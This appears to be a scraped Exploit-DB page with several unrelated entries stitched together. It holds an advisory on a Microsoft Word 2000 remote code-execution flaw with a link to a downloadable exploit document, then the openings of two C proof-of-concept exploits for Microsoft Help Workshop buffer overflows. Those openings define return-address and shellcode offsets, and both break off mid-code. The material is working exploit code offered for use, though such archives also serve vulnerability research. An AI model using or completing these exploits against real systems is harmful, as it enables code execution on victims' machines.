Microsoft Word 2000 is prone to a remote code-execution vulnerability.
Microsoft Word 2000 is confirmed vulnerable to a remote code-execution issue. Exploit attempts against Word 2003/XP will consume all CPU resources and will cause a denial of service for legitimate users.
Note that this issue is distinct from issues described in BID 21589 (Microsoft Word Code Execution Vulnerability), BID 21451 (Microsoft Word Malformed String Remote Code Execution Vulnerability), and BID 21518 (Microsoft Word Malformed Data Structures Code Execution Vulnerability).
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29524.doc
Exploit-DB
Microsoft Help Workshop 4.03.0002 - '.HPJ' Local Buffer Overflow
exploitdb·2007-01-19
CVE-2007-0427 Microsoft Help Workshop 4.03.0002 - '.HPJ' Local Buffer Overflow
---
//*****************
//
// PoC exploit for .HPJ project files buffer overflow vulnerability in
// Microsoft Help Workshop v4.03.0002
// The tool is standard component of MS Visual Studio v6.0 and 2003 (.NET)
//
// vulnerability found / exploit built by porkythepig
//
//*****************
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include "memory.h"
#define STR01 "Microsoft Help Workshop PoC exploit by porkythepig"
#define DEF_SPAWNED_PROCESS "notepad.exe"
#define EXPL_SIZE 671
#define PROC_NAM_SIZ 128
#define RET_OFFSET 0x14e
#define PROC_NAME_OFFSET 0x166
#define EXPRO_OFFSET 0xd9
#define GETSTAR_OFFSET 0x58
#define CREPRO_OFFSET 0xcf
#define GETWINDIR_OFFSET 0x73
typedef struct
{
unsigned int extPro;
Exploit-DB
Microsoft Help Workshop 4.03.0002 - '.cnt' Local Buffer Overflow
exploitdb·2007-01-17
CVE-2007-0427 Microsoft Help Workshop 4.03.0002 - '.cnt' Local Buffer Overflow
---
//*****************
//
// PoC exploit for .cnt files buffer overflow vulnerability in
// Microsoft Help Workshop v4.03.0002
// The tool is standard component of MS Visual Studio v6.0, 2003 (.NET)
//
// vulnerability found / exploit built by porkythepig
//
//*****************
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include "memory.h"
#define STR01 "0 Microsoft Help Workshop PoC exploit by porkythepig "
#define DEF_SPAWNED_PROCESS "notepad.exe"
#define EXPL_SIZE 619
#define PROC_NAM_SIZ 66
#define RET_OFFSET 0x210
#define PROC_NAME_OFFSET 0x228
#define BACK_SEQ_OFFSET 0x218
#define EXPRO_OFFSET 0xbf
#define GETSTAR_OFFSET 0x4a
#define CREPRO_OFFSET 0xb5
#define GETWINDIR_OFFSET 0x65
typedef struct
{
Published: 2007-04-12